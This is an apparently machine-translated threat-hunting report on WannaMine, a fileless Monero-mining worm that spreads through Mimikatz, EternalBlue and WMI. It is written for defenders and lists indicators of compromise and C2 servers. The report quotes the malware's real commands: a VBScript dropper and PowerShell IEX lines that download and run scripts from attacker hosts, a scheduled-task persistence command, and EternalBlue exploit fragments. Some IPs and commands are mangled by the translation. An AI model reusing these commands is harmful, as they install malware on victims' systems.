Threat Hunting: A new fileless attack for crypto mining has been discovered.

Fileless Monero WannaMine

Mining cryptocurrency (for example, Bitcoin, Ethereum or Monero) is no longer a wonder. Moreover, in recent years we have seen numerous attacks, whose main goal was to install mining software. For example, do not forget that before the advent of WannaCry, we already saw hackers who used the NSA's EternalBlue exploit to penetrate companies and install this type of software on their victims' devices.
')
It is safe to say that this is a thriving business, because the complexity of the attacks continues to increase. A few days ago, we discovered a new worm that uses hacking tools and scripts for distribution inside corporate networks, with the subsequent goal of mining Monero cryptocurrency on any network where it happened to “gain a foothold”.

When the specialists from the Threat Hunting service (in PandaLabs) discovered the following command, trying to execute inside one of the processes on the computer, the “alarm” was immediately activated:

CMD / V: ON / C FOR / F “TOKENS = 2 DELIMS =. [”% I IN ('VER') DO (SET A =% I) & IF! A: ~ -1! == 5 ( ECHO ON ERROR RESUME NEXT>% WINDIR% \ 11.VBS&@ECHO SET OX = CREATEOBJECT ^ (“MSXML2.XMLHTTP” ^) >>% WINDIR% \ 11.VBS&@ECHO OX.OPEN “GET”, ”HTTP: // STAFFTEST. FIREWALL-GATEWAY.COM:8000/INFO.VBS said, FALSE>>%WINDIR%\11.VBS&@ECHO OX.SETREQUESTHEADER “USER-AGENT”, “-“ >>% WINDIR% \ 11.VBS&@ECHO OX. SEND ^ (^) >>% WINDIR% \ 11.VBS&@ECHO IF OX.STATUS = 200 THEN >>% WINDIR% \ 11.VBS&@ECHO SET OAS = CREATEOBJECT ^ (“ADODB.STREAM” ^) >>% WINDIR% \ 11.VBS&@ECHO OAS.OPEN >>% WINDIR% \ 11.VBS&@ECHO OAS.TYPE = 1 >>% WINDIR% \ 11.VBS&@ECHO OAS.WRITE OX.RESPONSEBODY >>% WINDIR% \ 11.VBS&@ECHO OAS.SAVETOFILE “% WINDIR% \ INFO.VBS”, 2 >>% WINDIR% \ 11.VBS&@ECHO OAS.CLOSE >>% WINDIR% \ 11.VBS&@ECHO END IF >>% WINDIR % \ 11.VBS&@ECHO SET OS = CREATEOBJECT ^ (“WSCRIPT.SHELL” ^) >>% WINDIR% \ 11.VBS&@ECHO OS.EXEC ^ (“CSCRIPT.EXE% WINDIR% \ INFO.VBS” ^) >>% WINDIR% \ 11.VBS & CSCRIPT.EXE% WINDIR% \ 11.VBS) ELSE (POWERSHELL -NOP -NONI -W HIDDEN “IF ((GET-WMIOBJECT WIN32_OPERATIN GSYSTEM) .OSARCHITECTURE.CONTAINS ('64 ')) {IEX (NEW-OBJECT NET.WEBCLIENT) .DOWNLOADSTRING (' HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO6.PS1 ′)} ELSE {IEX ( NEW-OBJECTNET.WEBCLIENT) .DOWNLOADSTRING ('HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO3.PS1 ′)} “)

Network Distribution Analysis

Shortly after the investigation began, we began to observe how the attackers, knowing that they were discovered, closed down the management servers (C & C), but before that we were able to download the following files:

• B6FCD1223719C8F6DAF4AB7FBEB9A20A PS1 ~ 4MB
• 27E4F61EE65668D4C9AB4D9BF5D0A9E7 VBS ~ 2MB

These are two very confusing scripts. “Info6.ps1” loads the Mimikatz module (dll) into memory (without touching the hard disk) so that you can steal the registration data that will later be used for horizontal movements in the internal (unprotected) networks.



The script is implemented in Powershell by the well-known NetBios exploit, which is also known as EternalBlue (MS17-010) , so that it can start infecting other, not yet patched, Windows-based computers on the network.

$ TARGET_HAL_HEAP_ADDR_X64 = 0XFFFFFFFFFFD00010
$ TARGET_HAL_HEAP_ADDR_X86 = 0XFFDFF000
[BYTE []] $ FAKESRVNETBUFFERNSA = @ (0X00,0X10,0X01,0X00,0X00
[BYTE []] $ FAKESRVNETBUFFERX64 = @ (0X00,0X10,0X01,0X00,0X00
$ FAKESRVNETBUFFER = $ FAKESRVNETBUFFERNSA
[BYTE []] $ FEALIST = [BYTE []] (0X00,0X00,0X01,0X00)
$ FEALIST + = $ NTFEA [$ NTFEA_SIZE]
$ FEALIST + = 0X00,0X00,0X8F, 0X00 + $ FAKESRVNETBUFFER
$ FEALIST + = 0X12,0X34,0X78,0X56
[BYTE []] $ FAKE_RECV_STRUCT = @ (0X00,0X00,0X00,0X00,0X00,0X00

At the same time, it uses WMI for remote command execution. After the passwords were obtained for the computer, we see the “wmiprvse.exe” process on this computer and the execution of a command line similar to the following:

POWERSHELL.EXE -NOP -NONI -W HIDDEN -E JABZAHQAAQBTAGUAPQBBAEUABGB2AGKACGBVAG4ABQBLAG4AD ...

If we decode “base 64” from this command line, we will get the script presented in Appendix I.

"Vitality" in the system

In one of the scripts, you can find the following command, which allows you to ensure the "survivability" of the threat in the system:

CMD / C ECHO POWERSHELL -NOP “$ A = ([STRING] (GET-WMIOBJECT -NAMESPACE ROOT \ SUBSCRIPTION -CLASS __FILTERTOCONSUMERBINDING)); IF (($ A -EQ $ NULL) -OR (! ($ A.CONTAINS ( 'SCM EVENT FILTER')))) {IEX (NEW-OBJECT NET.WEBCLIENT) .DOWNLOADSTRING ('HTTP://STAFFTEST.SPDNS.EU:8000/MATE6.PS1')} ”>% TEMP% \ Y1.BAT && SCHTASKS / CREATE / RU SYSTEM / SC DAILY / TN YASTCAT / F / TR “% TEMP% \ Y1.BAT” && SCHTASKS / RUN / TN YASTCAT

As you can see, it programs the daily task of downloading and running the “y1.bat” file.
Please note that we do not have this file, because management servers are currently offline.

Infection vector

We still do not know the original vector of infection, because the networks in which the infection was detected and blocked were in the process of implementing the Adaptive Defense solution, and therefore at that time not the entire network was protected by this solution with advanced information security options. For this reason, we were unable to determine who the “patient zero” was and how it was compromised.

Among the possible options, this could be the download / execution of a file / trojan that first activated the worm, or it could be executed remotely with the help of some kind of exploit.

Management Servers

From the “info6.ps1” script we were able to determine the data of the management servers.

• spdns.eu
• firewall-gateway.com
• 179.67.243
• 184.48.95

Note that these servers stopped working on October 27, 2017.

118.184.48.95



107.179.67.243



stafftest.spdns.eu



stafftest.firewall-gateway.com



Ioc

• exe (Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196)
•% windir% \ 11.vbs
•% windir% \ info.vbs
•% windir% \ info6.ps1
• dll
• dll
• Tarea programada “yastcat”
• spdns.eu
• firewall-gateway.com
• 179.67.243
• 184.48.95

Conclusion

Once again, we are witnessing the professionalization of increasingly sophisticated attacks. Even when it comes to just installing Monero miners (and we leave aside data theft, sabotage or espionage), attackers use advanced techniques and special tactics. In fact, this is a fileless attack , with the result that most traditional antivirus solutions are barely able to detect it, much less react to it, and its victims can only wait for the generation of the necessary signatures (the fileless attack, though scripts and Monero client are loaded).

But these signatures will relate only to a specific attack, and therefore even at its slightest change, they will be useless, not to mention that only the result of the attack (its final stage) is detected, but it does not show how the attack develops in the network. and how computers are compromised.

Since the latest generation of security solutions not only classifies all the running processes on each computer, you can monitor the entire network in real time, which becomes an absolute necessity, because hackers resort to harmless techniques in which they abuse quite legitimate system utilities.

Watching all the processes, we can find the following events:

• Process creation and remote code injection
• Creating, modifying and opening files
• Creating and modifying registry entries
• Network events (communication aperture, file upload, etc.)
• Administrative events (creation of users, etc.)